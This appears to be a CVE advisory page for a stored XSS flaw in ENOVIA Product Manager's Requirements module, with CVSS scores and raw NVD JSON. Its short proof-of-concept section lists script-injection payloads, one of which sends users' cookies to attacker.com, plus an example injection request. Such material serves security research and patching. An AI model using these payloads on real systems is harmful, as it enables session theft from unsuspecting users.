Security Vulnerability Report
CVE-2025-10554 CVSS 8.7 HIGH

CVE-2025-10554

Published: 2025-11-24 16:15:47
Last Modified: 2026-01-12 18:50:11

Description

A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

Two CVSS v3.1 scores are recorded for this CVE (see the raw JSON below): a Secondary score and a Primary score. The headline score on this page is the Secondary one.

Secondary score
CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Primary score
CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Weakness: CWE-79

Configurations (Affected Products)

cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:* - VULNERABLE
3DEXPERIENCE R2023x
3DEXPERIENCE R2024x
3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-10554 PoC - Stored XSS in ENOVIA Product Manager Requirements
// This PoC demonstrates the XSS payload injection in Requirements module

// XSS Payload - can be injected in Requirements fields
var xssPayload = '<script>alert("XSS")</script>';
var xssPayloadCookie = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';

// Attack Scenario:
// 1. Attacker creates or edits a Requirement in ENOVIA Product Manager
// 2. Inject XSS payload in requirement name/description field
// 3. When other users view this requirement, the script executes

// Example: Creating malicious requirement via API or UI
// POST /ENOVIA/api/requirements
// {
//   "name": "Requirement Name<script>alert(document.cookie)</script>",
//   "description": "Description with XSS payload",
//   "type": "requirement"
// }

// The injected script will execute when:
// - Users browse the Requirements list
// - Users open the affected requirement detail page
// - Requirement data is displayed in reports or exports

References

Vendor Advisory: https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10554",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T16:15:46.980",
    "lastModified": "2026-01-12T18:50:11.377",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "r2023x",
                "versionEndIncluding": "r2025x",
                "matchCriteriaId": "A38313EB-6DE1-4460-84B4-559F14BBCC11"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}